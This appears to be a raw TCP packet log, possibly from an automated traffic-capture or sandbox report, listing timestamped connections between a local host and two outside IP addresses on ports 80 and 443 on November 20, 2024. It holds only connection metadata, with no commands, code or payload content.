                                                Nov 20, 2024 10:11:14.013236046 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013242960 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013269901 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013276100 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013303995 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013309002 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013338089 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013345957 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013372898 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013380051 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013412952 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.014132023 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.014172077 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.014203072 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.014214993 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.014239073 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.014242887 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.014272928 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.014281034 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.014307976 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.014312983 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.014358044 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.098160028 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:14.098222017 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:14.099517107 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:14.099517107 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:14.099555969 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:14.721831083 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:14.722158909 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:14.724428892 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:14.724443913 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:14.725846052 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:14.725857973 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:15.016335964 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:15.016408920 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:15.016454935 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:15.016454935 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:15.016566992 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:15.016566992 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:15.016586065 CET44349168198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:15.016649008 CET49168443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:15.016913891 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:15.021734953 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:15.250508070 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:15.250719070 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.201235056 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.208138943 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.208204031 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.208429098 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.215286970 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946014881 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946032047 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946044922 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946078062 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946085930 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.946090937 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946116924 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.946118116 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.946125984 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.946259975 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946274042 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946300983 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.946310997 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.946477890 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946520090 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.946549892 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946562052 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.946595907 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.951093912 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.951129913 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.951142073 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.951152086 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.951164961 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.951183081 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.951446056 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:16.951499939 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:16.952985048 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:17.090507030 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090523005 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090540886 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090554953 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090565920 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090578079 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090579033 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:17.090590000 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090615988 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:17.090615988 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:17.090615988 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:17.090775967 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.090816975 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:17.182405949 CET804916966.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:17.182473898 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:18.015239000 CET4916980192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:20.251553059 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:20.251668930 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:24.280049086 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:24.287035942 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:24.287087917 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:24.287302971 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:24.292218924 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038772106 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038808107 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038819075 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038830996 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038834095 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.038844109 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038856983 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038875103 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.038875103 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.038885117 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.038894892 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.038949013 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.038984060 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.039562941 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.039577007 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.039587975 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.039612055 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.039627075 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.040867090 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.045048952 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.045154095 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.045527935 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.045540094 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.045552969 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.045576096 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.045597076 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.182337999 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.182354927 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.182368040 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.182408094 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.182430983 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.182640076 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.182687044 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.188517094 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.188529968 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.188549995 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.188561916 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.188574076 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.188590050 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.193358898 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.193372011 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.193407059 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.193470001 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.193485975 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.193522930 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.198242903 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.198256016 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.198266983 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.198295116 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.198307991 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.198385000 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.198398113 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.198424101 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.198436975 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.204544067 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.204556942 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.204592943 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.204658985 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.204669952 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.204699993 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.210666895 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.210707903 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.324376106 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.324392080 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.324404001 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.324440956 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.324642897 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.324656010 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.324667931 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.324687958 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.324774027 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.324785948 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.324820042 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.324975014 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.325017929 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.325568914 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.325579882 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.325589895 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.325617075 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.325629950 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.325798035 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.325890064 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.326327085 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.326358080 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.326366901 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.326370001 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.326387882 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.326402903 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.326663017 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.326880932 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.327225924 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.327236891 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.327248096 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.327266932 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.327280998 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.327519894 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.327569962 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.328058004 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.328069925 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.328080893 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.328099966 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.328115940 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.328388929 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.328429937 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.328902006 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.328912973 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.328922987 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.328954935 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.328968048 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.329190016 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.329229116 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.329663992 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.329745054 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.329765081 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.329777002 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.329793930 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.329811096 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.330024004 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.330064058 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.330734015 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.330744982 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.330755949 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.330777884 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.330805063 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.330960035 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.330997944 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.331403017 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.331413984 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.331423998 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.331444025 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.331453085 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.331629038 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.331670046 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.416903973 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.416959047 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467004061 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467015982 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467055082 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467135906 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467147112 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467179060 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467187881 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467221975 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467335939 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467348099 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467359066 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467374086 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467387915 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467788935 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467801094 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467813015 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.467838049 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467848063 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.467988968 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468002081 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468012094 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468022108 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468027115 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468034983 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468050003 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468061924 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468365908 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468378067 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468414068 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468426943 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468585014 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468595982 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468606949 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468617916 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468625069 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468632936 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468638897 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468646049 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.468652964 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468666077 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.468681097 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.469269037 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.469279051 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.469290972 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.469304085 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.469310045 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.469314098 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.469322920 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.469326973 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.469336987 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.469340086 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.469350100 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.469364882 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.470124006 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470134974 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470144987 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470156908 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470168114 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470176935 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.470180035 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470191002 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.470202923 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.470221996 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.470679998 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470691919 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470701933 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470714092 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.470729113 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.470743895 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.471189022 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.471199989 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.471210957 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.471223116 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.471234083 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.471235991 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.471246958 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.471255064 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.471260071 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.471263885 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.471280098 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.471291065 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.472091913 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472104073 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472114086 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472125053 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472137928 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472141027 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.472151041 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472157955 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.472162962 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472174883 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472179890 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.472194910 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.472208977 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.472934008 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472949028 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472959042 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472970009 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.472980976 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.472995996 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.473157883 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473167896 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473198891 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.473341942 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473354101 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473365068 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473388910 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.473402977 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.473555088 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473566055 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473576069 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473603010 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.473614931 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.473618984 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.473685026 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.474042892 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.474055052 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.474095106 CET4917080192.168.2.2266.63.187.231
